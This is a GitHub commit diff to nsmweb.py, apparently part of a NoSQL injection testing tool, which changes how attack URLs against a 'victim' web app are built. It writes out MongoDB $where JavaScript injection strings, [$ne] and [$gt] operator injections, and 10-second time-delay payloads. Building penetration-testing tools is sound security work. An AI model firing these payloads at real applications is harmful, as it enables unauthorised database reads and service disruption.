Commit d06f69b

authored

Merge pull request #60 from SudhanshuC/master

Update nsmweb.py

2 parents 98021fc + 6c9fbe9 commit d06f69bCopy full SHA for d06f69b

File tree

1 file changed

+19

-35

lines changed

nsmweb.py

1 file changed

+19

-35

lines changed

`‎nsmweb.py`

Lines changed: 19 additions & 35 deletions

Original file line number	Diff line number	Diff line change
`@@ -133,6 +133,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`133`	`133`	`else:`
`134`	`134`	`print "Test 2: $where injection (string escape)"`
`135`	`135`
	`136`	`+ print uriArray[2]`
`136`	`137`	`req = urllib2.Request(uriArray[2], None, requestHeaders)`
`137`	`138`	`errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
`138`	`139`
`@@ -890,49 +891,31 @@ def buildUri(origUri, randValue):`
`890`	`891`	`return`
`891`	`892`
`892`	`893`	`x = 0`
`893`		`- uriArray[0] = split_uri[0] + "?"`
`894`		`- uriArray[1] = split_uri[0] + "?"`
`895`		`- uriArray[2] = split_uri[0] + "?"`
`896`		`- uriArray[3] = split_uri[0] + "?"`
`897`		`- uriArray[4] = split_uri[0] + "?"`
`898`		`- uriArray[5] = split_uri[0] + "?"`
`899`		`- uriArray[6] = split_uri[0] + "?"`
`900`		`- uriArray[7] = split_uri[0] + "?"`
`901`		`- uriArray[8] = split_uri[0] + "?"`
`902`		`- uriArray[9] = split_uri[0] + "?"`
`903`		`- uriArray[10] = split_uri[0] + "?"`
`904`		`- uriArray[11] = split_uri[0] + "?"`
`905`		`- uriArray[12] = split_uri[0] + "?"`
`906`		`- uriArray[13] = split_uri[0] + "?"`
`907`		`- uriArray[14] = split_uri[0] + "?"`
`908`		`- uriArray[15] = split_uri[0] + "?"`
`909`		`- uriArray[16] = split_uri[0] + "?"`
`910`		`- uriArray[17] = split_uri[0] + "?"`
`911`		`- uriArray[18] = split_uri[0] + "?"`
	`894`	`+`
`912`	`895`
`913`	`896`	`for item in paramName:`
`914`	`897`
`915`	`898`	`if paramName[x] in injOpt:`
`916`	`899`	`uriArray[0] += paramName[x] + "=" + randValue + "&"`
`917`	`900`	`uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"`
`918`		`- uriArray[2] += paramName[x] + "="+urllib.quote("a'; return db.a.find(); var dummy='!") + "&"`
`919`		`- uriArray[3] += paramName[x] + "="+urllib.quote("1; return db.a.find(); var dummy=1") + "&"`
`920`		`- uriArray[4] += paramName[x] + "="+urllib.quote("a'; return db.a.findOne(); var dummy='!") + "&"`
`921`		`- uriArray[5] += paramName[x] + "="+urllib.quote("1; return db.a.findOne(); var dummy=1") + "&"`
`922`		`- uriArray[6] += paramName[x] + "="+urllib.quote("a'; return this.a != '" + randValue + "'; var dummy='!") + "&"`
`923`		`- uriArray[7] += paramName[x] + "="+urllib.quote("1; return this.a !=" + randValue + "; var dummy=1") + "&"`
	`901`	`+ uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"`
	`902`	`+ uriArray[3] += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"`
	`903`	`+ uriArray[4] += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"`
	`904`	`+ uriArray[5] += paramName[x] + "=1; return db.a.findOne(); var dummy=1" + "&"`
	`905`	`+ uriArray[6] += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"`
	`906`	`+ uriArray[7] += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"`
`924`	`907`	`uriArray[8] += paramName[x] + "[$gt]=&"`
`925`		`- uriArray[9] += paramName[x] + "="+urllib.quote("1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1") + "&"`
`926`		`- uriArray[10] += paramName[x] + "="+urllib.quote("a\"; return db.a.find(); var dummy='!") + "&"`
`927`		`- uriArray[11] += paramName[x] + "="+urllib.quote("a\"; return this.a != '" + randValue + "'; var dummy='!") + "&"`
`928`		`- uriArray[12] += paramName[x] + "="+urllib.quote("a\"; return db.a.findOne(); var dummy=\"!") + "&"`
`929`		`- uriArray[13] += paramName[x] + "="+urllib.quote("a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!") + "&"`
`930`		`- uriArray[14] += paramName[x] + urllib.quote("a'; return true; var dum='a")`
	`908`	`+ uriArray[9] += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"`
	`909`	`+ uriArray[10] += paramName[x] + "=a\"; return db.a.find(); var dummy='!" + "&"`
	`910`	`+ uriArray[11] += paramName[x] + "=a\"; return this.a != '" + randValue + "'; var dummy='!" + "&"`
	`911`	`+ uriArray[12] += paramName[x] + "=a\"; return db.a.findOne(); var dummy=\"!" + "&"`
	`912`	`+ uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"`
	`913`	`+ uriArray[14] += paramName[x] + "a'; return true; var dum='a"`
`931`	`914`	`uriArray[15] += paramName[x] + "1; return true; var dum=2"`
`932`	`915`	`#Add values that can be manipulated for database attacks`
`933`		`- uriArray[16] += paramName[x] + "="+urllib.quote("a\'; ---")`
	`916`	`+ uriArray[16] += paramName[x] + "=a\'; ---"`
`934`	`917`	`uriArray[17] += paramName[x] + "=1; if ---"`
`935`		`- uriArray[18] += paramName[x] + "="+urllib.quote("a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!") + "&"`
	`918`	`+ uriArray[18] += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"`
`936`	`919`
`937`	`920`	`else:`
`938`	`921`	`uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"`
`@@ -959,7 +942,9 @@ def buildUri(origUri, randValue):`
`959`	`942`	`#Clip the extra & off the end of the URL`
`960`	`943`	`x = 0`
`961`	`944`	`while x <= 18:`
`962`		`- uriArray[x]= uriArray[x][:-1]`
	`945`	`+# uriArray[x]= uriArray[x][:-1]`
	`946`	`+ uriArray[x]=split_uri[0]+"?"+urllib.quote_plus(uriArray[x][:-1])`
	`947`	`+`
`963`	`948`	`x += 1`
`964`	`949`
`965`	`950`	`return uriArray[0]`
`@@ -1193,4 +1178,3 @@ def getDBInfo():`
`1193`	`1178`	`crackHash = raw_input("Crack another hash (y/n)?")`
`1194`	`1179`	`raw_input("Press enter to continue...")`
`1195`	`1180`	`return`
`1196`		`-`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Commit d06f69b

File tree

1 file changed

1 file changed

`‎nsmweb.py`

0 commit comments